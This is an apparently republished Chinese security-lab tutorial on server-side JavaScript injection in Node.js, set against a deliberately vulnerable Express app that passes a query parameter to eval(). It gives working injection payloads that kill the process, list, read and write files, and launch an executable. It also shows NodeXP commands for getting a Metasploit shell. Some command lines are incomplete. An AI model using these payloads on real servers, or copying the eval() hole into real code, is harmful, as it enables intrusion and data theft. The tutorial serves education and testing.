SSJI - Node.js vulnerability audit series, part 1 - Vulnerability warning - Black Bar Safety Net (MyHack58)

ID MYHACK58:62201993583
Type myhack58
Reporter Anonymous
Modified 2019-04-10T00:00:00


Hello, I am from the security laboratory of the Whispering Wind. With the help of Node.js, JavaScript has become a server-side scripting language, and since it now runs on the server side it can carry server-side security issues. SSJI (server-side JavaScript injection) is a relatively new attack technique: an attacker abuses JS functions on the server to execute malicious JS code and obtain a cmdshell.

0x01 Environment setup

Tools: Node.js, NodeXP, Metasploit Framework (MSF)

Setup: first install Node.js the straightforward way. After Node.js is installed, remember to also install the express framework: npm install express --save (newer versions of Node.js ship with npm).

0x02 SSJI hazards

If the input is not checked, the application may be vulnerable: an attacker can use JS functions on the server to execute malicious JS code. Which functions can be abused? eval(), setTimeout(), setInterval() and Function().

For example (Eval.js):

    var express = require('express');
    var app = express();
    app.get('/', function(req, res) {
      // Deliberately vulnerable: the "name" query parameter goes straight into eval()
      var resp = eval(req.query.name);
      res.send('Response' + resp);
    });
    app.listen(3002);
    console.log('Server running at');

When we run this js with Node.js, it opens a web service on local port 3002. It reads the parameter named name that is passed via GET and executes that value in eval(). We visit the port and then pass a parameter via GET, for example name=console.log("hello World");. After the parameter is passed, Hello World is clearly printed on the command line.

Since we can produce output, can we also execute other statements, for instance malicious ones? process.exit() / process.kill(process.pid) kills the running Node.js process; the process is terminated. Essentially, an attacker can perform almost any operation on the system within the limits of the user's permissions.

We can also call the core module fs to list the file and folder names in the current directory: res.end(require('fs').readdirSync('.').toString())

We can also call fs to write a file (there is no echo, but the file is still written): res.end(require('fs').writeFileSync('message.txt','hello'))

We can also call fs to read a file: res.end(require('fs').readFileSync('a.js','utf-8'))

If node-cmd is installed on the target machine, cmd can be called (to make the effect visible, I called an exe installer): var nodeCmd = require('node-cmd'); nodeCmd.run('360cse_9.5.0.138.exe'); Obviously cmd is called.

0x03 Getting a cmdshell with NodeXP

We can also try the NodeXP tool together with MSF to obtain a cmdshell.

Usage:
GET: python --url=http://localhost:3001/?name=[INJECT_HERE]
POST: python --url=http://localhost:3001/post.js --pdata=username=[INJECT_HERE]

Set the attack server's IP (the host running MSF), then set the port.
